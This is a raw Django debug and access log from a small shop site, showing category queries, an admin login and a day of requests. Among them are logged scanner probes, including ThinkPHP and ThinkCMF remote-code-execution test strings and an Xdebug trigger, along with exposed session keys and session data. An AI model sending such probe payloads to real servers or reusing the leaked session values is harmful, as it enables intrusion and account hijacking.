(0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2020-01-03 06:01:05,926 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2020-01-03 06:01:05,930 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2020-01-03 06:01:05,935 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2020-01-03 06:01:05,941 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2020-01-03 06:01:05,945 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2020-01-03 06:01:05,949 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2020-01-03 06:01:05,953 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2020-01-03 06:01:05,957 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2020-01-03 06:01:05,961 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2020-01-03 06:01:05,966 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2020-01-03 06:01:05,972 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2020-01-03 06:01:05,976 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2020-01-03 06:01:05,982 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2020-01-03 06:01:05,986 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [03/Jan/2020 06:01:05] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2020-01-03 06:01:09,927 utils 27361 140408542058240 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2020-01-03T06:01:09.917364+00:00'::timestamptz AND "django_session"."session_key" = 'ij1rvjd7c5r6c62sve58x3x0rjffl1dy'); args=(datetime.datetime(2020, 1, 3, 6, 1, 9, 917364, tzinfo=), 'ij1rvjd7c5r6c62sve58x3x0rjffl1dy') [03/Jan/2020 06:01:09] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-03 06:01:10,220 utils 27361 140408542058240 (0.006) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2020-01-03T06:01:10.204818+00:00'::timestamptz AND "django_session"."session_key" = 'ij1rvjd7c5r6c62sve58x3x0rjffl1dy'); args=(datetime.datetime(2020, 1, 3, 6, 1, 10, 204818, tzinfo=), 'ij1rvjd7c5r6c62sve58x3x0rjffl1dy') DEBUG 2020-01-03 06:01:10,259 utils 27361 140408542058240 (0.002) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2020-01-17T06:01:10.256311+00:00'::timestamptz WHERE "django_session"."session_key" = 'ij1rvjd7c5r6c62sve58x3x0rjffl1dy'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 17, 6, 1, 10, 256311, tzinfo=), 'ij1rvjd7c5r6c62sve58x3x0rjffl1dy') [03/Jan/2020 06:01:10] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /favicon.ico [03/Jan/2020 06:01:10] "GET /favicon.ico HTTP/1.0" 404 6346 DEBUG 2020-01-03 06:01:13,555 utils 27361 140408542058240 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2020-01-03T06:01:13.540623+00:00'::timestamptz AND "django_session"."session_key" = 'ij1rvjd7c5r6c62sve58x3x0rjffl1dy'); args=(datetime.datetime(2020, 1, 3, 6, 1, 13, 540623, tzinfo=), 'ij1rvjd7c5r6c62sve58x3x0rjffl1dy') DEBUG 2020-01-03 06:01:13,561 utils 27361 140408542058240 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'resfx-admin'; args=('resfx-admin',) DEBUG 2020-01-03 06:01:13,857 utils 27361 140408542058240 (0.001) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '7e72bpe684k9n4dezr873cmze6075idn' LIMIT 1; args=('7e72bpe684k9n4dezr873cmze6075idn',) DEBUG 2020-01-03 06:01:13,860 utils 27361 140408542058240 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('7e72bpe684k9n4dezr873cmze6075idn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-17T06:01:13.857894+00:00'::timestamptz); args=('7e72bpe684k9n4dezr873cmze6075idn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 17, 6, 1, 13, 857894, tzinfo=)) DEBUG 2020-01-03 06:01:13,863 utils 27361 140408542058240 (0.001) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE "django_session"."session_key" = 'ij1rvjd7c5r6c62sve58x3x0rjffl1dy'; args=('ij1rvjd7c5r6c62sve58x3x0rjffl1dy',) DEBUG 2020-01-03 06:01:13,866 utils 27361 140408542058240 (0.001) DELETE FROM "django_session" WHERE "django_session"."session_key" IN ('ij1rvjd7c5r6c62sve58x3x0rjffl1dy'); args=('ij1rvjd7c5r6c62sve58x3x0rjffl1dy',) DEBUG 2020-01-03 06:01:13,869 utils 27361 140408542058240 (0.002) UPDATE "auth_user" SET "last_login" = '2020-01-03T06:01:13.866867+00:00'::timestamptz WHERE "auth_user"."id" = 6; args=(datetime.datetime(2020, 1, 3, 6, 1, 13, 866867, tzinfo=), 6) DEBUG 2020-01-03 06:01:13,872 utils 27361 140408542058240 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-17T06:01:13.871257+00:00'::timestamptz WHERE "django_session"."session_key" = '7e72bpe684k9n4dezr873cmze6075idn'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 17, 6, 1, 13, 871257, tzinfo=), '7e72bpe684k9n4dezr873cmze6075idn') [03/Jan/2020 06:01:13] "POST /login/?next=/ HTTP/1.0" 302 0 DEBUG 2020-01-03 06:01:14,166 utils 27361 140408542058240 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2020-01-03T06:01:14.151375+00:00'::timestamptz AND "django_session"."session_key" = '7e72bpe684k9n4dezr873cmze6075idn'); args=(datetime.datetime(2020, 1, 3, 6, 1, 14, 151375, tzinfo=), '7e72bpe684k9n4dezr873cmze6075idn') DEBUG 2020-01-03 06:01:14,170 utils 27361 140408542058240 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2020-01-03 06:01:14,230 utils 27361 140408542058240 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2020-01-03 06:01:14,244 utils 27361 140408542058240 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-17T06:01:14.242309+00:00'::timestamptz WHERE "django_session"."session_key" = '7e72bpe684k9n4dezr873cmze6075idn'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 17, 6, 1, 14, 242309, tzinfo=), '7e72bpe684k9n4dezr873cmze6075idn') [03/Jan/2020 06:01:14] "GET / HTTP/1.0" 200 8208 [03/Jan/2020 06:01:14] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [03/Jan/2020 06:01:14] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [03/Jan/2020 06:01:14] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [03/Jan/2020 06:01:14] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [03/Jan/2020 06:05:02] "GET / HTTP/1.0" 302 0 [03/Jan/2020 06:10:05] "GET / HTTP/1.0" 302 0 [03/Jan/2020 06:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Jan/2020 06:15:08] "GET / HTTP/1.0" 302 0 [03/Jan/2020 06:16:45] "GET / HTTP/1.0" 302 0 [03/Jan/2020 06:20:46] "GET / HTTP/1.0" 302 0 [03/Jan/2020 06:25:49] "GET / HTTP/1.0" 302 0 [03/Jan/2020 06:30:52] "GET / HTTP/1.0" 302 0 [03/Jan/2020 06:35:55] "GET / HTTP/1.0" 302 0 [03/Jan/2020 06:40:57] "GET / HTTP/1.0" 302 0 [03/Jan/2020 06:45:59] "GET / HTTP/1.0" 302 0 [03/Jan/2020 06:52:06] "GET / HTTP/1.0" 302 0 [03/Jan/2020 06:57:12] "GET / HTTP/1.0" 302 0 [03/Jan/2020 07:05:02] "GET / HTTP/1.0" 302 0 [03/Jan/2020 07:12:18] "GET / HTTP/1.0" 302 0 [03/Jan/2020 07:20:45] "GET / HTTP/1.0" 302 0 [03/Jan/2020 07:25:48] "GET / HTTP/1.0" 302 0 [03/Jan/2020 07:26:04] "GET / HTTP/1.0" 302 0 Not Found: /echo.php [03/Jan/2020 07:26:38] "GET /echo.php HTTP/1.0" 404 6335 [03/Jan/2020 07:32:53] "GET / HTTP/1.0" 302 0 [03/Jan/2020 07:38:04] "GET / HTTP/1.0" 302 0 [03/Jan/2020 07:45:20] "GET / HTTP/1.0" 302 0 [03/Jan/2020 07:50:22] "GET / HTTP/1.0" 302 0 [03/Jan/2020 07:55:25] "GET / HTTP/1.0" 302 0 [03/Jan/2020 08:05:03] "GET / HTTP/1.0" 302 0 [03/Jan/2020 08:10:05] "GET / HTTP/1.0" 302 0 [03/Jan/2020 08:15:08] "GET / HTTP/1.0" 302 0 [03/Jan/2020 08:20:11] "GET / HTTP/1.0" 302 0 [03/Jan/2020 08:25:13] "GET / HTTP/1.0" 302 0 [03/Jan/2020 08:30:16] "GET / HTTP/1.0" 302 0 [03/Jan/2020 08:39:55] "GET / HTTP/1.0" 302 0 [03/Jan/2020 08:42:18] "GET / HTTP/1.0" 302 0 [03/Jan/2020 08:44:58] "GET / HTTP/1.0" 302 0 [03/Jan/2020 08:50:01] "GET / HTTP/1.0" 302 0 [03/Jan/2020 08:55:03] "GET / HTTP/1.0" 302 0 [03/Jan/2020 09:05:03] "GET / HTTP/1.0" 302 0 [03/Jan/2020 09:10:05] "GET / HTTP/1.0" 302 0 [03/Jan/2020 09:15:08] "GET / HTTP/1.0" 302 0 [03/Jan/2020 09:20:11] "GET / HTTP/1.0" 302 0 [03/Jan/2020 09:25:14] "GET / HTTP/1.0" 302 0 [03/Jan/2020 09:30:16] "GET / HTTP/1.0" 302 0 [03/Jan/2020 09:35:19] "GET / HTTP/1.0" 302 0 [03/Jan/2020 09:44:59] "GET / HTTP/1.0" 302 0 [03/Jan/2020 09:50:02] "GET / HTTP/1.0" 302 0 [03/Jan/2020 09:55:05] "GET / HTTP/1.0" 302 0 [03/Jan/2020 10:04:49] "GET / HTTP/1.0" 302 0 Invalid HTTP_HOST header: 'www.x3606.com_www.resfx.com'. The domain name provided is not valid according to RFC 1034/1035. Bad Request: /robots.txt [03/Jan/2020 10:09:36] "GET /robots.txt HTTP/1.0" 400 65132 [03/Jan/2020 10:12:33] "GET / HTTP/1.0" 302 0 Invalid HTTP_HOST header: 'www.x3606.com_www.resfx.com'. The domain name provided is not valid according to RFC 1034/1035. Bad Request: / [03/Jan/2020 10:12:55] "GET / HTTP/1.0" 400 64995 [03/Jan/2020 10:17:36] "GET / HTTP/1.0" 302 0 [03/Jan/2020 10:22:38] "GET / HTTP/1.0" 302 0 [03/Jan/2020 10:27:41] "GET / HTTP/1.0" 302 0 [03/Jan/2020 10:29:53] "GET / HTTP/1.0" 302 0 [03/Jan/2020 10:32:44] "GET / HTTP/1.0" 302 0 [03/Jan/2020 10:35:31] "GET / HTTP/1.0" 302 0 [03/Jan/2020 10:37:47] "GET / HTTP/1.0" 302 0 [03/Jan/2020 10:43:16] "GET / HTTP/1.0" 302 0 [03/Jan/2020 10:48:19] "GET / HTTP/1.0" 302 0 [03/Jan/2020 10:50:01] "GET /whm-server-status HTTP/1.0" 301 0 Not Found: /index.asp [03/Jan/2020 10:51:50] "GET /index.asp HTTP/1.0" 404 6338 [03/Jan/2020 10:53:22] "GET / HTTP/1.0" 302 0 [03/Jan/2020 10:58:24] "GET / HTTP/1.0" 302 0 [03/Jan/2020 11:01:42] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-03 11:01:43,477 utils 27361 140408453592832 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'c1cxi92z1ywkjx94p1iry4furbyl4mfw' LIMIT 1; args=('c1cxi92z1ywkjx94p1iry4furbyl4mfw',) DEBUG 2020-01-03 11:01:43,479 utils 27361 140408453592832 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('c1cxi92z1ywkjx94p1iry4furbyl4mfw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-17T11:01:43.477696+00:00'::timestamptz); args=('c1cxi92z1ywkjx94p1iry4furbyl4mfw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 17, 11, 1, 43, 477696, tzinfo=)) [03/Jan/2020 11:01:43] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Jan/2020 11:05:02] "GET / HTTP/1.0" 302 0 [03/Jan/2020 11:10:05] "GET / HTTP/1.0" 302 0 [03/Jan/2020 11:16:52] "GET / HTTP/1.0" 302 0 [03/Jan/2020 11:21:55] "GET / HTTP/1.0" 302 0 [03/Jan/2020 11:30:18] "GET / HTTP/1.0" 302 0 [03/Jan/2020 11:35:21] "GET / HTTP/1.0" 302 0 [03/Jan/2020 11:38:13] "GET / HTTP/1.0" 302 0 [03/Jan/2020 11:40:24] "GET / HTTP/1.0" 302 0 [03/Jan/2020 11:45:26] "GET / HTTP/1.0" 302 0 [03/Jan/2020 11:50:29] "GET / HTTP/1.0" 302 0 [03/Jan/2020 11:55:32] "GET / HTTP/1.0" 302 0 [03/Jan/2020 12:02:35] "GET / HTTP/1.0" 302 0 [03/Jan/2020 12:07:52] "GET / HTTP/1.0" 302 0 [03/Jan/2020 12:08:39] "GET / HTTP/1.0" 302 0 [03/Jan/2020 12:14:22] "GET / HTTP/1.0" 302 0 Not Found: /solr/admin/info/system [03/Jan/2020 12:16:55] "GET /solr/admin/info/system?wt=json HTTP/1.0" 404 6384 [03/Jan/2020 12:19:24] "GET / HTTP/1.0" 302 0 [03/Jan/2020 12:24:27] "GET / HTTP/1.0" 302 0 [03/Jan/2020 12:29:30] "GET / HTTP/1.0" 302 0 [03/Jan/2020 12:34:32] "GET / HTTP/1.0" 302 0 [03/Jan/2020 12:39:35] "GET / HTTP/1.0" 302 0 [03/Jan/2020 12:40:01] "GET /whm-server-status HTTP/1.0" 301 0 Not Found: /robots.txt [03/Jan/2020 12:43:05] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /dyzl/Print.asp [03/Jan/2020 12:43:29] "GET /dyzl/Print.asp?ArticleID=284 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [03/Jan/2020 12:43:44] "GET /xyzx/SendMail.asp?ArticleID=398 HTTP/1.0" 404 6376 [03/Jan/2020 12:44:38] "GET / HTTP/1.0" 302 0 [03/Jan/2020 12:48:23] "GET / HTTP/1.0" 302 0 [03/Jan/2020 12:49:40] "GET / HTTP/1.0" 302 0 [03/Jan/2020 12:54:42] "GET / HTTP/1.0" 302 0 [03/Jan/2020 12:59:45] "GET / HTTP/1.0" 302 0 [03/Jan/2020 13:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Jan/2020 13:05:03] "GET / HTTP/1.0" 302 0 [03/Jan/2020 13:10:05] "GET / HTTP/1.0" 302 0 [03/Jan/2020 13:15:08] "GET / HTTP/1.0" 302 0 [03/Jan/2020 13:20:11] "GET / HTTP/1.0" 302 0 [03/Jan/2020 13:25:13] "GET / HTTP/1.0" 302 0 [03/Jan/2020 13:30:16] "GET / HTTP/1.0" 302 0 [03/Jan/2020 13:35:19] "GET / HTTP/1.0" 302 0 [03/Jan/2020 13:36:16] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.0" 302 0 [03/Jan/2020 13:36:16] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2020-01-03 13:36:16,837 utils 27361 140408453592832 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'a12rp6bzaaocnvtmddqabz7ewjm0dwuk' LIMIT 1; args=('a12rp6bzaaocnvtmddqabz7ewjm0dwuk',) DEBUG 2020-01-03 13:36:16,841 utils 27361 140408453592832 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('a12rp6bzaaocnvtmddqabz7ewjm0dwuk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-17T13:36:16.838327+00:00'::timestamptz); args=('a12rp6bzaaocnvtmddqabz7ewjm0dwuk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 17, 13, 36, 16, 838327, tzinfo=)) [03/Jan/2020 13:36:16] "GET /login/?next=/%3Fa%3Dfetch%26content%3D%253Cphp%253Edie%28%40md5%28HelloThinkCMF%29%29%253C/php%253E HTTP/1.0" 200 1936 DEBUG 2020-01-03 13:36:17,131 utils 27361 140408453592832 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'j6j530qdqlriyrnuqib5y1xq8q5vlyp4' LIMIT 1; args=('j6j530qdqlriyrnuqib5y1xq8q5vlyp4',) DEBUG 2020-01-03 13:36:17,133 utils 27361 140408453592832 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('j6j530qdqlriyrnuqib5y1xq8q5vlyp4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-17T13:36:17.132330+00:00'::timestamptz); args=('j6j530qdqlriyrnuqib5y1xq8q5vlyp4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 17, 13, 36, 17, 132330, tzinfo=)) [03/Jan/2020 13:36:17] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 [03/Jan/2020 13:40:22] "GET / HTTP/1.0" 302 0 [03/Jan/2020 13:45:54] "GET / HTTP/1.0" 302 0 Not Found: /index.php [03/Jan/2020 13:46:07] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.0" 404 6454 [03/Jan/2020 13:50:57] "GET / HTTP/1.0" 302 0 [03/Jan/2020 13:55:59] "GET / HTTP/1.0" 302 0 [03/Jan/2020 14:05:02] "GET / HTTP/1.0" 302 0 [03/Jan/2020 14:10:37] "GET / HTTP/1.0" 302 0 [03/Jan/2020 14:15:40] "GET / HTTP/1.0" 302 0 [03/Jan/2020 14:20:43] "GET / HTTP/1.0" 302 0 [03/Jan/2020 14:25:46] "GET / HTTP/1.0" 302 0 [03/Jan/2020 14:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Jan/2020 14:30:49] "GET / HTTP/1.0" 302 0 [03/Jan/2020 14:35:52] "GET / HTTP/1.0" 302 0 [03/Jan/2020 14:44:43] "GET / HTTP/1.0" 302 0 [03/Jan/2020 14:49:46] "GET / HTTP/1.0" 302 0 [03/Jan/2020 14:55:00] "GET / HTTP/1.0" 302 0 [03/Jan/2020 15:00:01] "GET / HTTP/1.0" 302 0 [03/Jan/2020 15:05:03] "GET / HTTP/1.0" 302 0 [03/Jan/2020 15:10:06] "GET / HTTP/1.0" 302 0 [03/Jan/2020 15:15:08] "GET / HTTP/1.0" 302 0 [03/Jan/2020 15:20:11] "GET / HTTP/1.0" 302 0 [03/Jan/2020 15:25:14] "GET / HTTP/1.0" 302 0 [03/Jan/2020 15:30:17] "GET / HTTP/1.0" 302 0 [03/Jan/2020 15:35:19] "GET / HTTP/1.0" 302 0 [03/Jan/2020 15:40:22] "GET / HTTP/1.0" 302 0 [03/Jan/2020 15:45:25] "GET / HTTP/1.0" 302 0 [03/Jan/2020 15:50:27] "GET / HTTP/1.0" 302 0 [03/Jan/2020 15:59:06] "GET / HTTP/1.0" 302 0 [03/Jan/2020 15:59:42] "GET / HTTP/1.0" 302 0 [03/Jan/2020 16:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Jan/2020 16:05:03] "GET / HTTP/1.0" 302 0 [03/Jan/2020 16:15:04] "GET / HTTP/1.0" 302 0 [03/Jan/2020 16:20:06] "GET / HTTP/1.0" 302 0 [03/Jan/2020 16:25:09] "GET / 